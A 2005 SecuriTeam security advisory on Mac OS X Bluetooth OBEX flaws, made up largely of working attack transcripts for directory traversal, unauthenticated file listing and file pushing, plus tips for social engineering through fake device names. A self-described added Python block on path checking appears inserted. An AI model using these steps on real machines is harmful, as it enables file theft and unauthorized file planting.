[NEWS] Apple OS X Multiple Bluetooth Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 05/04/05

    To: list@securiteam.com
    Date: 4 May 2005 18:16:09 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Apple OS X Multiple Bluetooth Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    Starting with Mac OSX 10.2 Apple decided to include support for Bluetooth
    devices. Apple's Bluetooth Software Technology Preview was also available
    for a brief period of time on Mac OSX 10.1.4. With the Bluetooth
    technology that is integrated in Mac OS X, you can easily connect your
    Apple computer with your Palm OS-based handheld device, mobile phone and
    other peripherals with Bluetooth technology.

    In addition to the new PowerBook G4 portable line, Bluetooth-enabled
    computers are available across Apple's entire CPU product line, including
    iBook, iMac G5, eMac, Mac mini and Power Mac G5. Bluetooth is available in
    some cases as a standard feature and in others as an add-on option. You can
    even enable your previous-generation iBook, iMac or Power Mac by simply
    plugging in a Bluetooth USB Adapter and letting Mac OSX take care of the
    rest.

    Apple OS X's Bluetooth file exchange service is enabled by default on
    systems with Bluetooth capability. This could allow files to be shared
    without properly notifying the user. In addition, the default directory
    for file sharing may be used by other applications, leading to
    unintentional file sharing.

    DETAILS

    Vulnerable Systems:
     * Mac OSX version 10.3.9 and prior

    In Apple's Bluetooth implementation, the OBEX FTP service by default allows
    access to the /Users/Shared directory without requiring any sort of user
    authentication. The service is also enabled by default as soon as a user has
    logged into the machine.

    The following output demonstrates the ability to view files located in
    /Users/Shared:
    animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
    <folder-listing version="1.0">
    <folder name="Faxes" created="19961103T141500Z" size="0"/>
    <folder name="New Folder" created="19961103T141500Z" size="0"/>
    <folder name="SC Info" created="19961103T141500Z" size="0"/>
    </folder-listing>

    Further, it appears that several applications use /Users/Shared as a
    config file repository. For example, it was found that GarageBand, Quicken,
    the Microsoft RDP client, Blizzard's World of Warcraft and iTunes dumped
    assorted files into /Users/Shared. Even 'SC Info.sidb', the iTunes database
    of decryption keys, is stored under this directory and can be retrieved over
    Bluetooth.

    In addition to being able to browse the files located in /Users/Shared, you
    also have the ability to place files onto the machine in the same
    directory. This may, for example, allow you to place potentially offensive
    or illegal material onto an individual's computer.

    Aside from OBEX File Transfer, the OSX Bluetooth interface also offers an
    OBEX Object Push service. Object Push is usually used for passing
    business cards to other Bluetooth users. Object Push has an option
    called "Folder for Accepted Items". Under normal circumstances all files
    should be dropped into this directory; however, this restriction can be
    bypassed. The OBEX Object Push service appears to be vulnerable to a
    directory traversal attack.

    The first step is obviously to check what channel OPUSH is on.
    animosity:/home/kfinisterre# sdptool browse 00:11:B1:07:BE:A7
    Browsing 00:11:B1:07:BE:A7 ...
    Service Name: Bluetooth-PDA-Sync
    Service RecHandle: 0x10004
    Service Class ID List:
      "Serial Port" (0x1101)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 3
    Language Base Attr List:
      code_ISO639: 0x656e
      encoding: 0x6a
      base_offset: 0x100
    Profile Descriptor List:
      "Serial Port" (0x1101)
        Version: 0x0100

    Service Name: OBEX Object Push
    Service RecHandle: 0x10002
    Service Class ID List:
      "OBEX Object Push" (0x1105)
    Protocol Descriptor List:
      "L2CAP" (0x00000100)
      "RFCOMM" (0x0003)
        Channel: 10
      "OBEX" (0x0008)
    Language Base Attr List:
      code_ISO639: 0x656e
      encoding: 0x6a
      base_offset: 0x100
    Profile Descriptor List:
      "OBEX Object Push" (0x1105)
        Version: 0x0100

    Service Name: OBEX File Transfer
    Service RecHandle: 0x10003
    Service Class ID List:
      "OBEX File Transfer" (0x1106)
    Protocol Descriptor List:
      "L2CAP" (0x00000100)
      "RFCOMM" (0x0003)
        Channel: 15
      "OBEX" (0x0008)
    Language Base Attr List:
      code_ISO639: 0x656e
      encoding: 0x6a
      base_offset: 0x100
    Profile Descriptor List:
      "OBEX File Transfer" (0x1106)
        Version: 0x0100

    Fire up an rfcomm connection.
    animosity:/home/kfinisterre# rfcomm connect 0 00:11:B1:07:BE:A7 10
    Connected /dev/rfcomm0 to 00:11:B1:07:BE:A7 on channel 10
    Press CTRL-C for hangup

    Drop a file in /tmp.
    kfinisterre@animosity:~/ussp-push-0.3$ ./ussp-push /dev/rfcomm0 /etc/hosts ./../../../../../../../../tmp/blah
    pushing file /etc/hosts
    name=/etc/hosts, size=257
    Registered transport

    set user data

    created new objext

    started a new request
    reqdone
    Command (00) has now finished, rsp: 20Connected!

    Connection return code: 0, id: 0
    Connection established
    connected to server
    Sending file: ../../../../../../../../../tmp/blah, path: /etc/hosts, size: 257

    At this point the Mac user is prompted by a window with the title
    'Incoming File Transfer'. The options are to 'Decline' or 'Accept' with
    the ability to also 'Accept all without warning' by clicking a check box.
    There is a bluetooth icon with the device name of the connecting machine.
    The device name information is even more useful as it can be used to
    induce the user to click on the 'Accept' button.

    Consider the following as an example:
    animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name *Sexy*Blonde*5*tables*over
    animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name *Critical*Apple*Bluetooth*Update
    animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name *Apple*Update*Please*Click*Accept

    Luckily for an attacker, only the basename() form of the file being
    transferred is shown. In the above example all we would see is 'blah' as
    the incoming filename. Odds are that most 'toothy' males would accept any
    file from the Sexy Blonde 5 tables over.

    After you coax the user to accept the file, either by clicking 'Accept' or
    by pressing Enter, the file above is promptly dropped in /tmp.

    Kevin-Finisterres-Computer:~kevinfinisterre$ ls /tmp
    501 blah mcx_compositor

    In addition to the above vulnerabilities, the OBEX File Transfer service
    is also vulnerable to directory traversal.

    animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l -c ../
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
    <folder-listing version="1.0">
    <parent-folder />
    <file name="4D WebSTAR Installer.log" created="19961103T141500Z" size="195662"/>
    <folder name="johnh" created="19961103T141500Z" size="0"/>
    <folder name="kevinfinisterre" created="19961103T141500Z" size="0"/>
    <folder name="Shared" created="19961103T141500Z" size="0"/>
    <folder name="webstar" created="19961103T141500Z" size="0"/>
    </folder-listing>

    animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l -c ../../
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
    <folder-listing version="1.0">
    <parent-folder />
    <folder name="Applications" created="19961103T141500Z" size="0"/>
    <folder name="automount" created="19961103T141500Z" size="0"/>
    <folder name="bin" created="19961103T141500Z" size="0"/>
    <folder name="cores" created="19961103T141500Z" size="0"/>
    <file name="Desktop DB" created="19961103T141500Z" size="3584"/>
    <file name="Desktop DF" created="19961103T141500Z" size="4482"/>
    <folder name="dev" created="19961103T141500Z" size="0"/>
    <folder name="Developer" created="19961103T141500Z" size="0"/>
    <file name="etc" created="19961103T141500Z" size="11"/>
    <folder name="Library" created="19961103T141500Z" size="0"/>
    <file name="mach" created="19961103T141500Z" size="9"/>
    <file name="mach.sym" created="19961103T141500Z" size="570532"/>
    <file name="mach_kernel" created="19961103T141500Z" size="3863716"/>
    <folder name="Network" created="19961103T141500Z" size="0"/>
    <folder name="private" created="19961103T141500Z" size="0"/>
    <folder name="sbin" created="19961103T141500Z" size="0"/>
    <folder name="System" created="19961103T141500Z" size="0"/>
    <file name="tmp" created="19961103T141500Z" size="11"/>
    <folder name="Users" created="19961103T141500Z" size="0"/>
    <folder name="usr" created="19961103T141500Z" size="0"/>
    <file name="var" created="19961103T141500Z" size="11"/>
    <folder name="Volumes" created="19961103T141500Z" size="0"/>
    </folder-listing>
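    Both traversal cases above (the Object Push Name header of '../../tmp/blah' and the File Transfer '-c ../' navigation) come down to an OBEX server joining an untrusted path onto its configured folder without checking that the result stays inside it. The following is added example code, not Apple's implementation or the advisory author's tooling: it shows the unchecked join beside a containment check for both services, with the accepted-items folder and share root being constructed paths.

```python
import posixpath

# Constructed roots for a hypothetical Mac: where Object Push drops accepted
# files, and the directory OBEX File Transfer is meant to expose.
ACCEPTED_DIR = "/Users/kevinfinisterre/Documents"
FTP_ROOT = "/Users/Shared"


def vulnerable_target(accepted_dir, obex_name):
    """The behaviour the advisory shows: the untrusted OBEX Name header is
    joined onto the folder and normalised, so leading '../' components walk
    out of it and '../../../../tmp/blah' lands at '/tmp/blah'."""
    return posixpath.normpath(posixpath.join(accepted_dir, obex_name))


def hardened_target(accepted_dir, obex_name):
    """Path an incoming Object Push file may be written to, or None to reject.
    The Name header is treated as a bare file name: any separator, NUL byte or
    dot-name is refused, and the joined result must still sit directly in
    accepted_dir (a second check in case normalisation surprises us)."""
    if not obex_name or "\0" in obex_name or "/" in obex_name or "\\" in obex_name:
        return None
    if obex_name in (".", ".."):
        return None
    root = posixpath.normpath(accepted_dir)
    target = posixpath.normpath(posixpath.join(root, obex_name))
    return target if posixpath.dirname(target) == root else None


def safe_setpath(ftp_root, current, requested):
    """Resolve an OBEX SetPath request ('..', 'sub', 'a/b') for the File
    Transfer service. `current` is server-side state (already inside ftp_root).
    Returns the new absolute directory, or None if the request would leave
    ftp_root, which is exactly what the '-c ../' listings above exploit."""
    root = posixpath.normpath(ftp_root)
    if "\0" in requested or "\\" in requested:
        return None
    candidate = posixpath.normpath(posixpath.join(current, requested))
    # Accept only the root itself or a path strictly below it.
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None
```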

    Disclosure Timeline:
    Thu, 10 Mar 2005 Follow-up: 7841131 assigned by auto ticketing system.
    Sat, 12 Mar 2005 Dispute usage of /Users/Shared with Bluetooth with Apple.
    Thu, 17 Mar 2005 Apple is 'still investigating this issue'. Introduce greenplaque to Apple.
    Sat, 19 Mar 2005 Justin Tibbs (jay ex tizzle) pointed out World of Warcraft uses /Users/Shared.
    Sat, 19 Mar 2005 JxT and KF discover and report that iTunes leaves its auth db in /Users/Shared.
    Sun, 20 Mar 2005 OBEX Object Push directory traversal issues discovered and reported.
    Mon, 04 Apr 2005 OBEX File Transfer daemon flaws discovered and reported.
    Sat, 09 Apr 2005 More Apple follow-ups.
    Thu, 23 Apr 2005 AppleSeed testing begins.

    CVE Information:
     <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1332>
    CAN-2005-1332

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:kf_lists@digitalmunition.com> KF.
    The original article can be found at:
    http://www.digitalmunition.com/DMA[2005-0502a].txt
